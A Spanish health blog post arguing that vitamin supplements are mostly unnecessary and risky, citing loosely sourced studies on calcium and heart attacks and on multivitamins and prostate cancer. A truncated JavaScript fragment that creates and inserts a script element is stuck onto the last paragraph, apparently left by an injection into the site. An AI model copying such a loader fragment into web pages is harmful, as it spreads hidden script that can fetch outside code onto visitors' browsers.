Salud y belleza » Medicina, Salud

El lado V: complementos vitamínicos

Sin Comentarios

En la actualidad -haciendo la inocencia y el quijotismo a un lado- el valor de la medicina no sólo significa la búsqueda de cierta perfección en la calidad de vida humana: sus acciones también se miden de acuerdo a la bolsa de valores (la económica, ganancial, dineral). Si se entiende, ya no sólo se trata de cómo curar al hombre sino también de qué provechos se pueden sacar mediante la dispensión de cada una de esas soluciones creadas para, en primera instancia, claro, enriquecer su existencia (luego, ya no). En este terreno, la industria de los complementos vitamínicos, por ejemplo, representa para España un ingreso anual de casi treinta millones de euros.

Pero, ¿ qué números estadísticos se pueden dar sobre sus efectos y resultados para el hombre?. Pocos, realmente pocos. Los complementos vitamínicos se suelen utilizar para suplir la carencia de vitaminas y minerales, sin embargo este aspecto se puede mejorar con métodos más sanos como, simplemente, una buena alimentación. Efectivamente, comer bien es infinitamente superior para el bien del organismo que acudir a paquetes artificiales que, a su vez, representan otro tipo de peligros aún mayores.

Por ejemplo, una reciente investigación arroja datos alarmantes: las mujeres que toman complementos de calcio en lugar de corregir su alimentación, tienen un 50% más de probabilidades de tener un infarto que las que no lo toman.
Esto no termina aquí pues, otro estudio realizado por profesionales en USA sugiere que los hombres que ingieren multivitamínicos tienen, también, un mayor riesgo de padecer cáncer de próstata avanzado.

“Saturar el cuerpo con suplementos vitamínicos para combatir situaciones  naturales es una práctica cada vez más frecuente, se calcula que el 15% de los personas consumen estos productos. Lo que no muchos saben es que, salvo en casos muy concretos, su ingesta no solo es inncesaria sino también riesgosa. En cualquier caso, antes de recurrir a productos elaborados es mejor optar directamente por métodos naturales, sanos y simples. Y, en última instancia, antes de consumir cualquier complemento es de vital importancia consultar con un médico” recomienda, justamente, un profesional de la medicina.

Como vemos, la utilidad de los complementos vitamínicos es dudosa y, en todo caso, existen caminos alternativos antes de verse en la obligación de caer en aquella opción.
La medicina, desde ya, a menudo abusa de ciertos recursos. No por nada  un sabio norteamericano dijo una vez que “el mejor médico es el que conoce la inutilidad de la mayor parte de las medicinas”. Vaya que tenía razón.document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.